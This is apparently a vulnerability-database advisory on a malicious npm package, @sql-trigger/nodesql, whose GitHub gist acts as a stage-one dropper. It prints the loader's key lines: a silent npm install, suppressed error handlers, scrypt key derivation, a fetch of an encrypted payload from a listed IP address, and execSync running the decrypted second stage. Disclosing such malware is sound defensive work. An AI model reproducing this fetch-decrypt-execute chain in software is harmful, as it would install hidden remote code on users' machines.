VDB
GCVE-110-OSM-2026-6565
GCVE-110-OSM-2026-6565
Advisory PublishedCVSS 9.6/10
This GitHub gist is called by the @sql-trigger/nodesql npm package. This javascript is a loader and pulls another payload from GitHub.
A Node.js loader / stage-1 dropper. Static flow:
1. Pre-stages npm dependencies in the OS temp dir (line 675, g.NkKqx = string at line 262):
execSync("npm install axios socket.io-client --no-warnings --no-progress --loglevel silent",
{ windowsHide: true, cwd: os.tmpdir() })
1. The presence of socket.io-client suggests the second-stage maintains a persistent C2 socket.
2. Silences error reporting (line 680) so the user sees no crash:
process.on("uncaughtException", () => {})
process.on("unhandledRejection", () => {})
3. Derives an AES-256 key from a hardcoded campaign/bot ID (lines 681–683):
K = "449715fcb64b249fe789438e2a31e996" // also used as the URL path
M = crypto.scryptSync(K, "salt", 32) // literal salt is the word "salt"
4. Fetches the encrypted payload (line 702):
GET http://5.231.107.184/api/service/449715fcb64b249fe789438e2a31e996
4. Response body format: "<iv_b64>:<ciphertext_b64>" (split on : into 2 parts at line 707).
5. Decrypts with AES-256-CBC using the scrypt-derived key + supplied IV, then writes the cleartext to <tmpdir>/pack with flag: 'w+' (lines 706–708).
6. Executes the dropped second stage (line 709):
execSync("node pack", { windowsHide: true, cwd: os.tmpdir() })
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | all (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.